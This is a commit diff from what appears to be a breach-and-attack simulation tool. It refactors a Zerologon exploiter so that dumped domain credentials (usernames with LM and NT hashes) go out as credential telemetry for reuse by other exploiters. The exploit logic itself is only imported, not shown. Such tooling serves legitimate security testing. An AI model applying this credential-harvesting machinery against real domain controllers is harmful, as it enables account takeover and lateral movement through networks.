Agent: Send extracted creds as CredentialTelemetry from Zerologon exploiter
This commit is contained in:
parent
aee3566a0c
commit
040227286a
|
@ -16,11 +16,14 @@ from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
|
||||||
from impacket.dcerpc.v5.dtypes import NULL
|
from impacket.dcerpc.v5.dtypes import NULL
|
||||||
|
|
||||||
from common.utils.exploit_enum import ExploitType
|
from common.utils.exploit_enum import ExploitType
|
||||||
|
from infection_monkey.credential_collectors import LMHash, NTHash, Username
|
||||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
from infection_monkey.exploit.HostExploiter import HostExploiter
|
||||||
from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
|
from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
|
||||||
from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump
|
from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump
|
||||||
from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable
|
from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable
|
||||||
from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
|
from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
|
||||||
|
from infection_monkey.i_puppet.credential_collection import Credentials
|
||||||
|
from infection_monkey.telemetry.credentials_telem import CredentialsTelem
|
||||||
from infection_monkey.utils.capture_output import StdoutCapture
|
from infection_monkey.utils.capture_output import StdoutCapture
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
@ -36,7 +39,6 @@ class ZerologonExploiter(HostExploiter):
|
||||||
|
|
||||||
def __init__(self, host: object):
|
def __init__(self, host: object):
|
||||||
super().__init__(host)
|
super().__init__(host)
|
||||||
self.exploit_info["credentials"] = {}
|
|
||||||
self.exploit_info["password_restored"] = None
|
self.exploit_info["password_restored"] = None
|
||||||
self._extracted_creds = {}
|
self._extracted_creds = {}
|
||||||
self._secrets_dir = tempfile.TemporaryDirectory(prefix="zerologon")
|
self._secrets_dir = tempfile.TemporaryDirectory(prefix="zerologon")
|
||||||
|
@ -264,7 +266,7 @@ class ZerologonExploiter(HostExploiter):
|
||||||
|
|
||||||
def store_extracted_creds_for_exploitation(self) -> None:
|
def store_extracted_creds_for_exploitation(self) -> None:
|
||||||
for user in self._extracted_creds.keys():
|
for user in self._extracted_creds.keys():
|
||||||
self.add_extracted_creds_to_exploit_info(
|
self.send_extracted_creds_as_credential_telemetry(
|
||||||
user,
|
user,
|
||||||
self._extracted_creds[user]["lm_hash"],
|
self._extracted_creds[user]["lm_hash"],
|
||||||
self._extracted_creds[user]["nt_hash"],
|
self._extracted_creds[user]["nt_hash"],
|
||||||
|
@ -275,18 +277,11 @@ class ZerologonExploiter(HostExploiter):
|
||||||
self._extracted_creds[user]["nt_hash"],
|
self._extracted_creds[user]["nt_hash"],
|
||||||
)
|
)
|
||||||
|
|
||||||
def add_extracted_creds_to_exploit_info(self, user: str, lmhash: str, nthash: str) -> None:
|
def send_extracted_creds_as_credential_telemetry(
|
||||||
# TODO exploit_info["credentials"] is discontinued,
|
self, user: str, lmhash: str, nthash: str
|
||||||
# refactor to send a credential telemetry
|
) -> None:
|
||||||
self.exploit_info["credentials"].update(
|
self._telemetry_messenger.send_telemetry(
|
||||||
{
|
CredentialsTelem([Credentials([Username(user)], [LMHash(lmhash), NTHash(nthash)])])
|
||||||
user: {
|
|
||||||
"username": user,
|
|
||||||
"password": "",
|
|
||||||
"lm_hash": lmhash,
|
|
||||||
"ntlm_hash": nthash,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
)
|
)
|
||||||
|
|
||||||
# so other exploiters can use these creds
|
# so other exploiters can use these creds
|
||||||
|
|
Loading…
Reference in New Issue